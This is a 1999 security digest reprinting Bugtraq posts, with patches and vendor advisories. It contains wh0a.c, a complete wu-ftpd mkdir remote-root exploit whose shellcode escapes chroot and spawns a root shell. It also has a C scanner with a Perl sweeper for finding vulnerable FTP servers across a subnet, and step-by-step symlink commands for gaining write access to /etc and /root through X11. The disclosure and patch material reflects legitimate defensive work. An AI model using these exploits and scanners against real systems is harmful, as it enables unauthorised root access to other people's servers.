AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Mar 21 12:21:47 gear ftpd[21737]: exiting on signal 11 oops..... now it attempted to execute piece at 0x41414141 addy.. Some previous beta releases of wu-ftpd are NOT vulneriable to this thing because they just don't call realpath function (which does overflow) from makedir() function. Here's quick patch I've done to this piece (cc'ed to bugtraq since I haven't seen yet any patches fixing this problem were posted there): --/cut here/-- --- ftpd.c.orig Mon Jul 6 15:14:25 1998 +++ ftpd.c Sun Mar 21 18:17:52 1999 @@ -3146,19 +3146,24 @@ if (mkdir(name, 0777) < 0) { if (errno == EEXIST){ - realpath(name, path); - reply(521, "\"%s\" directory exists", path); + if(realpath(name, path)) + reply(521, "\"%s\" directory exists.", path); + else reply(521,"path too long."); }else perror_reply(550, name); return; } - realpath(name, path); /* According to RFC 959: * The 257 reply to the MKD command must always contain the * absolute pathname of the created directory. * This is implemented here using similar code to the PWD command. * XXX - still need to do `quote-doubling'. */ + if(!realpath(name, path)) + if (strlen(path)!=0) + reply(257,"\"%s\" directory created name truncated.",path); + else reply(500,"no directory created. Path too long."); + else reply(257, "\"%s\" new directory created.", path); } --- realpath.c.orig Sun Mar 21 17:29:42 1999 +++ realpath.c Sun Mar 21 18:08:28 1999 @@ -40,6 +40,7 @@ #include #include #include +#include #ifndef HAVE_SYMLINK #define lstat stat @@ -55,10 +56,10 @@ #endif { struct stat sbuf; - char curpath[MAXPATHLEN], - workpath[MAXPATHLEN], - linkpath[MAXPATHLEN], - namebuf[MAXPATHLEN], + char curpath[MAXPATHLEN+1], + workpath[MAXPATHLEN+1], + linkpath[MAXPATHLEN+1], + namebuf[MAXPATHLEN+1], *where, *ptr, *last; @@ -75,7 +76,7 @@ return(NULL); } - strcpy(curpath, pathname); + strncpy(curpath, pathname,MAXPATHLEN); if (*pathname != '/') { uid_t userid; @@ -93,7 +94,7 @@ #else if (!getwd(workpath)) { #endif - strcpy(result, "."); + strncpy(result, ".",MAXPATHLEN); seteuid(userid); enable_signaling(); /* we can allow signals once again: kinch */ return (NULL); @@ -142,9 +143,13 @@ for (last = namebuf; *last; last++) continue; if ((last == namebuf) || (*--last != '/')) - strcat(namebuf, "/"); - strcat(namebuf, where); - + strncat(namebuf, "/",MAXPATHLEN-strlen(namebuf)); + strncat(namebuf, where,MAXPATHLEN-strlen(namebuf)); + if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) { + syslog(LOG_DAEMON|LOG_NOTICE,"possible buffer overflow attempt"); + return(NULL); + } + where = ++ptr; if (lstat(namebuf, &sbuf) == -1) { strcpy(result, namebuf); @@ -163,8 +168,13 @@ if (*linkpath == '/') *workpath = '\0'; if (*where) { - strcat(linkpath, "/"); - strcat(linkpath, where); + strncat(linkpath, "/",MAXPATHLEN-strlen(linkpath)); + strncat(linkpath, where,MAXPATHLEN-strlen(linkpath)); + if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) { + syslog(LOG_DAEMON|LOG_NOTICE, + "possible buffer overflow attempt"); + return(NULL); + } } strcpy(curpath, linkpath); goto loop; @HWA 28.0 wh0a.c wu-FTPd beta exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 25 Mar 1999 15:42:47 +0100 From: Pieter Nieuwenhuijsen To: BUGTRAQ@netspace.org Subject: another ftp exploit /* wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 ) by joey__ of rhino9 - 2/20/99 big thx horizon, duke, nimrood and icee sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha USAGE: ( ./wh0a [ initialdir ] [ ] [ ] ; cat ) | nc */ #include char x86_shellcode0[156] = "\x83\xec\x04" /* sub esp,4 */ /* esi -> local variables and data */ "\x5e" /* pop esi */ "\x83\xc6\x70" /* add esi,0x70 */ "\x83\xc6\x20" /* add esi,0x20 */ "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */ /* decode the strings */ "\x31\xc9" /* xor ecx, ecx */ "\xb1\x30" /* mov cl,0x30 */ "\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */ "\x43" /* inc ebx */ "\x49" /* dec ecx */ "\x75\xf9" /* jnz short decode_next_byte */ "\x31\xc0" /* xor eax,eax */ /* setuid ( 0 ) */ "\x89\xc3" /* mov ebx,eax */ "\xb0\x17" /* mov al,0x17 */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* setgid ( 0 ) */ "\x89\xc3" /* mov ebx,eax */ "\xb0\x2e" /* mov al,0x2e */ "\xcd\x80" /* int 0x80 */ /* To break chroot we have to... fd = open ( ".", O_RDONLY ); mkdir ( "hax0r", 0666 ); chroot ( "hax0r" ); fchdir ( fd ); for ( i = 0; i < 254; i++ ) chdir ( ".." ); chroot ( "." ); */ "\x31\xc0" /* xor eax,eax */ /* var0 = open ( ".", O_RDONLY ) */ "\x31\xc9" /* xor ecx,ecx */ "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */ "\xb0\x05" /* mov al,0x05 */ "\xcd\x80" /* int 0x80 */ "\x89\x06" /* mov [esi],eax */ "\x31\xc0" /* xor eax,eax */ /* mkdir ( "hax0r", 0666 ) */ "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */ "\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */ "\xb0\x27" /* mov al,0x27 */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* chroot ( "hax0r" ) */ "\x8d\x5e\x11" /* lea ebx,[esi+0x11] */ "\xb0\x3d" /* mov al,0x3d */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* fchdir ( fd ) */ "\x8b\x1e" /* mov ebx,[esi] */ "\xb0\x85" /* mov al,0x85 */ "\xcd\x80" /* int 0x80 */ "\x31\xc9" /* xor ecx, ecx */ /* for ( i = 0; i < 254; i++ ) { */ "\xb1\xfe" /* mov cl,0xfe */ "\x31\xc0" /* xor eax,eax */ /* chdir ( ".." ) */ "\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */ "\xb0\x0c" /* mov al,0x0c */ "\xcd\x80" /* int 0x80 */ "\x49" /* dec ecx */ /* } */ "\x75\xf4" /* jnz short goto_parent_dir */ "\x31\xc0" /* xor eax,eax */ /* chroot ( "." ) */ "\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */ "\xb0\x3d" /* mov al,0x3d */ "\xcd\x80" /* int 0x80 */ "\x31\xc0" /* xor eax,eax */ /* execve ( "/bin/sh", "xxxxx", NULL ) */ "\x8d\x5e\x17" /* lea ebx,[esi+0x17] */ "\x8d\x4e\x04" /* lea ecx,[esi+0x04] */ "\x8d\x56\x08" /* lea edx,[esi+0x08] */ "\x89\x19" /* mov [ecx],ebx */ "\x89\x02" /* mov [edx],eax */ "\xb0\x0b" /* mov al, 0x0b */ "\xcd\x80" /* int 0x80 */ "\x31\xdb" /* xor ebx,ebx */ /* exit ( 0 ) */ "\x89\xd8" /* mov eax,ebx */ "\x40" /* inc eax */ "\xcd\x80" /* int 0x80 */ "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "\x90" "var0" /* local variable integer */ "cmd0" /* char *cmd[2] */ "cmd1"; char x86_shellcode1[1024] = ".." "\x00" "." "\x00" "hax0r" "\x00" "/bin/sh" "\x00" "\xb6\x01\x00\x00"; char vardir[300]; int varlen; main ( int argc, char **argv ) { char *username, *password, *initialdir; int bufoffset, codeaddr, i, j, *pcodeaddr; if ( argc > 1 ) initialdir = argv[1]; else initialdir = "/incoming"; if ( argc > 3 ) { username = argv[2]; password = argv[3]; } else { username = "anonymous"; password = "poon@ni.com"; } if ( argc > 5 ) { bufoffset = atoi ( argv[4] ); codeaddr = atoi ( argv[5] ); } else { bufoffset = 195; codeaddr = 0x0805ac81; } printf ( "user %s\n", username ); printf ( "pass %s\n", password ); printf ( "cwd %s\n", initialdir ); varlen = bufoffset - strlen ( initialdir ); for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 210; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 210; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 170; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; vardir[varlen] = 0; printf ( "mkd %s\n", vardir ); printf ( "cwd %s\n", vardir ); varlen = 250; for ( i = 0; i < varlen; i++ ) vardir[i] = 'x'; for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ ) vardir[i] = x86_shellcode0[i]; j = 0; for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ ) { vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 ); } pcodeaddr = ( int * ) &( vardir[varlen] ); *pcodeaddr = codeaddr; vardir[varlen+4] = 0; printf ( "mkd %s\n", vardir ); } ---------------------------------------------------------------------- Date: Fri, 26 Mar 1999 14:08:25 +0200 From: Artem Malyshev To: BUGTRAQ@netspace.org Subject: Re: another ftp exploit (fwd) > /* To break chroot we have to... > > fd = open ( ".", O_RDONLY ); > mkdir ( "hax0r", 0666 ); > chroot ( "hax0r" ); > fchdir ( fd ); > for ( i = 0; i < 254; i++ ) > chdir ( ".." ); > chroot ( "." ); > > */ Too complex for standart linux All we have to do to break chroot is: mkdir("/sh"); // we already have string "/sh" in memory as a part of // "/bin/sh" chroot("/sh"); chroot("../../../../../../../../../"); // a number of "../" here, // I used 0x10 Last string can be built is stack with a simple loop Tested on linux 2.2.1 -am @HWA 29.0 Netscape 4.51 allows url sniffing from another window , exploit and patch ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Thu, 25 Mar 1999 20:07:52 +0200 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator 4.51 allows sniffing of URLs from another window There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window. The exploit uses the ability to execute JavaScript code from specially designed URLs in the javascript console window, when an error is deliberately invoked. Demonstration and source is available at: http://www.nat.bg/~joro/b11.html (The exploit does not work if you are behind some versions of a squid proxy. If you do not see your URL in a message box, try reloading the main page). Workaround: Disable JavaScript. Regards, Georgi Guninski ----------Demonstration and source---------- http://www.nat.bg/~joro/b11.html -------------------------------------------- Control window -------------------------------------------- http://www.nat.bg/~joro/b11main.html -------------------------------------------- Control Window There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.
This page tracks the URLs the user visits in another window.
Enter your URL in the 'Tracked window'. Wait until the document is loaded, then click 'Show URL'.
This exploit needs Javascript enabled.
Workaround: Disable Javascript.

Written by Georgi Guninski @HWA 30.0 X11R6 rewt compromise exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sun, 21 Mar 1999 21:34:48 -0800 From: in.telnetd To: BUGTRAQ@netspace.org Subject: X11R6 NetBSD Security Problem Hey If this has already been brought up, you have the right to stone me to death, But I havent seen it and ive searched, so here it is: I was fooling around today, and decided to rm /tmp/.X11-unix and then make a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed up /etc/passwd and ln -s /etc/passwd /tmp/.X11-unix and then startx'd as normal user acount, But X wouldnt start, it complained and said "is not a directory" So, I made a symbolic link from /root to /tmp/.X11-unix, and startx'd as a normal user, and was suprised to have write access to /root. I was able to write new files to /root but was not able to overright or change files, i was able to make a "+ +" .rhosts though. I did this to /etc also, changed it from: drwxr-xr-x To: drwxrwxrwt with: telnetd ~$ ln -s /etc /tmp/.X11-unix telnetd ~$ startx I have tested this via a remote telnet sesion also, It works if you are able to startx and X isnt already running, I swung my chair around and got on my gateway, telneted to stinky, logged in as a normal user, ln -s /etc /tmp/.X11-unix, startx'd remotly, Saw the X startup crap, looked behind me and saw X starting on stinky, I turned to my gateway and stoped X, and had write access to /etc. wh00t@$#!$ The only real thing I can think of for this to be usefull is .rhosts in /root... later telnetd@doemill.shocking.com ----------------------------------------------------------------------------- Date: Sun, 21 Mar 1999 21:41:40 -0800 From: in.telnetd To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem oops, i forgot to say, this was on NetBSD 1.3.3, fresh install if you could apend this to my last message, it would be apreciated aleph1 ----------------------------------------------------------------------------- Date: Thu, 25 Mar 1999 17:20:26 -0800 From: /usr/libexec/telnetd To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem Well, when theres a reboot, /tmp/ is cleared. And If you havent started X yet, it could be a problem. This isnt and ultra spiffy important problem, just thought I would bring it up. > drwxrwxrwt 2 root root 1024 Mar 25 10:52 .X11-unix/ > > I'd like to see a non-root user delete that from /tmp. Many systems have this > in place like this, since root is the first to log into X. Systems that do not > have this directory owned by root should chown it. > > Taral > ----------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 23:41:02 +0200 From: Petras Sinkevicius To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem On Sun, 21 Mar 1999, in.telnetd wrote: > oops, i forgot to say, this was on NetBSD 1.3.3, fresh install > if you could apend this to my last message, it would be apreciated aleph1 > This also works under Linux, X11 v3.3.3, links to directories and files ---- bebras@petras:/tmp> ln -s /etc/group /tmp/.X11-unix bebras@petras:/tmp> ls -l /etc/group -rw-r--r-- 1 root root 336 Mar 6 13:56 /etc/group bebras@petras:/tmp> startx _X11TransSocketUNIXConnect: Can't connect: errno = 111 giving up. xinit: Connection refused (errno 111): unable to connect to X server xinit: No such process (errno 3): Server error. bebras@petras:/tmp> ls -l /etc/group -rwxrwxrwt 1 root root 336 Mar 6 13:56 /etc/group* ---- -- Drakosha Petras Sinkevicius petras@bebras.dammit.lt ----------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 21:21:20 +0100 From: Matthieu Herrb To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem in.telnetd wrote (in a message from Sunday 21) > > telnetd ~$ ln -s /etc /tmp/.X11-unix > telnetd ~$ startx The following patch should fix this: Index: xc/lib/xtrans/Xtransint.h =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtransint.h,v retrieving revision diff -u -r1.1.1.2 Xtransint.h --- xc/lib/xtrans/Xtransint.h 1998/11/28 08:26:08 +++ xc/lib/xtrans/Xtransint.h 1999/03/26 08:20:27 @@ -455,6 +455,12 @@ #endif ); +static int trans_mkdir ( +#if NeedFunctionPrototypes + char *, /* path */ + int /* mode */ +#endif +); /* * Some XTRANSDEBUG stuff Index: xc/lib/xtrans/Xtranslcl.c =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtranslcl.c,v retrieving revision diff -u -r1.1.1.4 Xtranslcl.c --- xc/lib/xtrans/Xtranslcl.c 1999/01/08 17:31:44 +++ xc/lib/xtrans/Xtranslcl.c 1999/03/26 08:20:32 @@ -444,9 +444,11 @@ #else mode = 0777; #endif - - mkdir(X_STREAMS_DIR, mode); - chmod(X_STREAMS_DIR, mode); + if (trans_mkdir(X_STREAMS_DIR, mode) == -1) { + PRMSG (1, "PTSOpenServer: mkdir(%s) failed, errno = %d\n", + X_STREAMS_DIR, errno, 0); + return(-1); + } if( (fd=open(server_path, O_RDWR)) >= 0 ) { #if 0 @@ -724,9 +726,11 @@ #else mode = 0777; #endif - - mkdir(X_STREAMS_DIR, mode); - chmod(X_STREAMS_DIR, mode); + if (trans_mkdir(X_STREAMS_DIR, mode) == -1) { + PRMSG (1, "NAMEDOpenServer: mkdir(%s) failed, errno = %d\n", + X_STREAMS_DIR, errno, 0); + return(-1); + } if(stat(server_path, &sbuf) != 0) { if (errno == ENOENT) { @@ -1044,10 +1048,18 @@ mode = 0777; #endif - mkdir(X_STREAMS_DIR, mode); /* "/dev/X" */ - chmod(X_STREAMS_DIR, mode); - mkdir(X_ISC_DIR, mode); /* "/dev/X/ISCCONN" */ - chmod(X_ISC_DIR, mode); + /* "/dev/X" */ + if (trans_mkdir(X_STREAMS_DIR, mode) == -1) { + PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n", + X_STREAMS_DIR, errno, 0); + return(-1); + } + /* "/dev/X/ISCCONN" */ + if (trans_mkdir(X_ISC_DIR, mode) == -1) { + PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n", + X_ISC_DIR, errno, 0); + return(-1); + } unlink(server_path); @@ -1072,8 +1084,11 @@ */ #define X_UNIX_DIR "/tmp/.X11-unix" - mkdir(X_UNIX_DIR, mode); - chmod(X_UNIX_DIR, mode); + if (trans_mkdir(X_UNIX_DIR, mode) == -1) { + PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n", + X_UNIX_DIR, errno, 0); + return(-1); + } unlink(server_unix_path); Index: xc/lib/xtrans/Xtranssock.c =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtranssock.c,v retrieving revision diff -u -r1.1.1.4 Xtranssock.c --- xc/lib/xtrans/Xtranssock.c 1999/01/08 17:31:46 +++ xc/lib/xtrans/Xtranssock.c 1999/03/26 08:20:38 @@ -946,8 +946,11 @@ #else mode = 0777; #endif - mkdir (UNIX_DIR, mode); - chmod (UNIX_DIR, mode); + if (trans_mkdir(UNIX_DIR, mode) == -1) { + PRMSG (1, "SocketUNIXCreateListener: mkdir(%s) failed, errno = %d\n", + UNIX_DIR, errno, 0); + return TRANS_CREATE_LISTENER_FAILED; + } #endif sockname.sun_family = AF_UNIX; @@ -1041,8 +1044,11 @@ #else mode = 0777; #endif - mkdir (UNIX_DIR, mode); - chmod (UNIX_DIR, mode); + if (trans_mkdir(UNIX_DIR, mode) == -1) { + PRMSG (1, "SocketUNIXResetListener: mkdir(%s) failed, errno = %d\n", + UNIX_DIR, errno, 0); + return TRANS_RESET_FAILURE; + } #endif close (ciptr->fd); Index: xc/lib/xtrans/Xtransutil.c =================================================================== RCS file: /cvs/X11/xc/lib/xtrans/Xtransutil.c,v retrieving revision diff -u -r1.1.1.1 Xtransutil.c --- xc/lib/xtrans/Xtransutil.c 1997/09/05 09:02:43 +++ xc/lib/xtrans/Xtransutil.c 1999/03/26 08:20:40 @@ -465,3 +465,32 @@ return (1); } + +#include +#include +#include + +static int +trans_mkdir(char *path, int mode) +{ + struct stat buf; + + if (mkdir(path, mode) == 0) { + /* I don't know why this is done, but it was in the original + xtrans code */ + chmod(path, mode); + return 0; + } + /* If mkdir failed with EEXIST, test if it is a directory with + the right modes, else fail */ + if (errno == EEXIST) { + if (stat(path, &buf) != 0) { + return -1; + } + if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) { + return 0; + } + } + /* In all other cases, fail */ + return -1; +} -- Matthieu ----------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 13:55:13 +0100 From: Pavel Machek To: BUGTRAQ@netspace.org Subject: not only NetBSD [was Re: X11R6 NetBSD Security Problem] Hi! > If this has already been brought up, you have the right to stone me to > death, But I havent seen it and ive searched, so here it is: > > I was fooling around today, and decided to rm /tmp/.X11-unix and then make > a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed > up /etc/passwd and > ln -s /etc/passwd /tmp/.X11-unix > and then startx'd as normal user acount, But X wouldnt start, it > complained and said "is not a directory" So, I made a symbolic link from > /root to /tmp/.X11-unix, and startx'd as a normal user, and was suprised > to have write access to /root. I tried to reproduce on 2.2.4 linux using XFree86 Version 3.3.2 / X Window System (protocol Version 11, revision 0, vendor release 6300) Release Date: March 2 1998 If the server is older than 6-12 months, or if your card is newer than the above date, look for a newer version before reporting problems. (see http://www.XFree86.Org/FAQ) . I'm not able to get write access to /etc, still I'm able to create file srwxrwxrwx 1 root root 0 Mar 26 13:48 X0= in previously unwritable directory. Bug, it seems. [There was some talk about /tmp/.X11-unix directories, and I think that this problem might very well get _worse_ with new 3.3.3 release. Please check.] Pavel -- I'm really pavel@atrey.karlin.mff.cuni.cz. Pavel Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-). ----------------------------------------------------------------------------- Date: Sun, 28 Mar 1999 19:01:41 -0800 From: Kevin Vajk To: BUGTRAQ@netspace.org Subject: Re: X11R6 NetBSD Security Problem This patch looks pretty good. (Much better than the current situatiuon!!!) A few comments: On Fri, 26 Mar 1999, Matthieu Herrb wrote: > + if (errno == EEXIST) { > + if (stat(path, &buf) != 0) { This should be lstat(). > + if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) { > + return 0; > + } > + } I think you'll want to check the owner of the directory, too. - Kevin Vajk ----------------------------------------------------------------------------- Date: Wed, 31 Mar 1999 11:12:52 -0600 From: Patrick J. Volkerding To: BUGTRAQ@netspace.org Subject: XFree86 security problem On Mon, 29 Mar 1999, Domas Mituzas wrote: > why is RedHat delaying release of this package > as it smells like root takeover (it was too easy > to change /etc/ and /etc/passwd permissions to > something neat). > > [...] > > This is cross-platform bug, as I found it in > all OS that run XFree86 3.3.3 server. As far as > I know it is on every Linux distribution (especially > newest ones) and BSD's. Before flying off the handle at Red Hat, you might consider that quite possibly they aren't vulnerable to this problem. As far as I can tell, if the system ships with a /tmp/.X11-unix/ directory already in place, and none of the system scripts delete it, then there's no security problem since nobody can put a rogue symlink at that location in /tmp. I know Slackware Linux isn't vulnerable to this problem, and never was, and I don't think we're the only ones to ship a Linux OS that provides a pre-existing /tmp/.X11-unix/. -- Patrick J. Volkerding Slackware Linux Project @HWA 31.0 Yet another wu-ftpd scanner by 03m0s1s ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 24 Mar 1999 06:29:20 PST From: baku@EXCITE.COM To: BUGTRAQ@netspace.org Subject: WUftp scanner Hi, aleph1 this is a quick and dirty scanner I wrote to look for vulernable wu-ftpd servers. <---------wscan.c------> #include #define FTPPORT 21 #define VERBOSE 1 int main (int argc, char **argv) { struct hostent *hp; struct in_addr addr; struct sockaddr_in s; u_char *buf[280]; int p, i; if (argc == 1) { printf("WUftpd Buffer overflow scanner.\n"); printf("Written by 03m0s1s 3/19/1999\n"); printf ("Usage: %s \n",argv[0]); exit (1); } hp = gethostbyname (argv[1]); if (!hp) exit (1); bcopy (hp->h_addr, &addr, sizeof (struct in_addr)); p = socket (s.sin_family = 2, 1, IPPROTO_TCP); s.sin_port = htons (FTPPORT); s.sin_addr.s_addr = inet_addr (inet_ntoa (addr)); connect (p, &s, sizeof (s)); alarm (4); /*Time out after 4 seconds */ read (p, buf, 255); /* Grab the banner*/ if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)")) { if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999")) printf ("%s is patched.\n", inet_ntoa (addr)); else printf ("%s is vulnerable.\n", inet_ntoa (addr)); /*It must be the "Mon Aug 3 19:17:20 EDT 1998) ready." banner. */ } else printf ("%s does not look BETA-18.\n", inet_ntoa (addr)); if (VERBOSE) printf ("%s\n\n", buf); write (p,"bye\n",4); /*We just want the banner no need to stick around.*/ } <------end wuscan.c----------> <-------wuss perl script-----> #!/usr/bin/perl -w #Automate class C subnet scan, it doesnt check to see if the host is up #could add a ping routine in here. #Syntax ./wuss [aaa.bbb.ccc] $net = $ARGV[0]; $START=1; $END=254; while ($START < $END) { $HOST ="$net.$START"; print `./wuscan $HOST`; $START = $START + 1; } <------wuss---------> ----------------------------------------------------------------------------- Date: Thu, 25 Mar 1999 22:25:39 -0500 From: Gregory A Lundberg To: BUGTRAQ@netspace.org Subject: Re: WUftp scanner On Wed, 24 Mar 1999 baku@EXCITE.COM wrote: > if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)")) No. Way to strict. You'll miss people who touched ftpcmd.y and recompiled: Version wu-2.4.2-academ[BETA-18](2) And you'll miss earlier versions which are vulnerable, say: Version wu-2.4.2-academ[BETA-12] And you'll miss derivatives which are vulnerable, like one of mine: Version wu-2.4.2-academ[BETA-18-VR6] > { > if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999")) > printf ("%s is patched.\n", inet_ntoa (addr)); No. That's the date and time _you_ compiled the daemon. The target machine was probably compiled some other time. -- Gregory A Lundberg Senior Partner, VRnet Company 1441 Elmdale Drive lundberg+wuftpd@vr.net Kettering, OH 45409-1615 USA 1-800-809-2195 ----------------------------------------------------------------------------- Date: Fri, 26 Mar 1999 10:05:54 -0700 From: Scott Stone To: BUGTRAQ@netspace.org Subject: Re: WUftp scanner On Wed, 24 Mar 1999 baku@EXCITE.COM wrote: > Hi, aleph1 > this is a quick and dirty scanner I wrote to look for vulernable wu-ftpd > servers. Sorry, but this is kind of dumb. This will check to make sure that you're using a specific build of wu-ftpd... but what if you rebuilt it yourself? then the timestamp will be different. The timestamp reflects the time/date/zone in which this particular server binary was COMPILED. So basically all this program tells me is if I'm using Redhat's prebuilt wu-ftpd binary, right? My TurboLinux wu-ftpd RPM is correctly patched, but it will say that it's 19:19:11 PST 1999 since that's when I built it, and I built it in California. @HWA 32.0 RedHat linux security advisories ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -----BEGIN PGP SIGNED MESSAGE----- Security vulnerabilities have been identified in various packages that ship with Red Hat Linux. Red Hat would like to thank the members of the BUGTRAQ mailing list, the members of the Linux Security Audit team, and others. All users of Red Hat Linux are encouraged to upgrade to the new packages immediately. As always, these packages have been signed with the Red Hat PGP key. mutt, pine: - - ----------- An problem in the mime handling code could allow a remote user to execute certain commands on a local system. Red Hat Linux 5.2 - - ----------------- alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/mutt-0.95.4us-0.alpha.rpm rpm -Uvh ftp://updates.redhat.com/5.2/alpha/pine-4.10-1.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/mutt-0.95.4us-0.i386.rpm rpm -Uvh ftp://updates.redhat.com/5.2/i386/pine-4.10-1.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/mutt-0.95.4us-0.sparc.rpm rpm -Uvh ftp://updates.redhat.com/5.2/sparc/pine-4.10-1.sparc.rpm source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/mutt-0.95.4us-0.src.rpm rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/pine-4.10-1.src.rpm Red Hat Linux 5.1 - - ----------------- alpha: rpm -Uvh ftp://updates.redhat.com/5.1/alpha/mutt-0.95.4us-0.alpha.rpm rpm -Uvh ftp://updates.redhat.com/5.1/alpha/pine-3.96-8.1.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/5.1/i386/mutt-0.95.4us-0.i386.rpm rpm -Uvh ftp://updates.redhat.com/5.1/i386/pine-3.96-8.1.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/5.1/sparc/mutt-0.95.4us-0.sparc.rpm rpm -Uvh ftp://updates.redhat.com/5.1/sparc/pine-3.96-8.1.sparc.rpm source: rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/mutt-0.95.4us-0.src.rpm rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/pine-3.96-8.1.src.rpm Red Hat Linux 5.0 - - ----------------- alpha: rpm -Uvh ftp://updates.redhat.com/5.0/alpha/mutt-0.95.4us-0.alpha.rpm rpm -Uvh ftp://updates.redhat.com/5.0/alpha/pine-3.96-7.1.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/5.0/i386/mutt-0.95.4us-0.i386.rpm rpm -Uvh ftp://updates.redhat.com/5.0/i386/pine-3.96-7.1.i386.rpm source: rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/mutt-0.95.4us-0.src.rpm rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/pine-3.96-7.1.src.rpm Red Hat Linux 4.2 - - ----------------- alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/pine-3.96-7.0.alpha.rpm i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/pine-3.96-7.0.i386.rpm source: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/pine-3.96-7.0.sparc.rpm source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/pine-3.96-7.0.src.rpm (Mutt was not shipped with Red Hat Linux 4.2) sysklogd - - -------- An overflow in the parsing code could lead to crashes of the system logger. Red Hat Linux 5.0,5.1,5.2: - - -------------------------- alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-0.5.alpha.r pm i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-0.5.i386.rpm sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-0.5.sparc.r pm source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm Red Hat Linux 4.2: - - ------------------ alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.0.alpha.r pm i386: rpm -Uvh 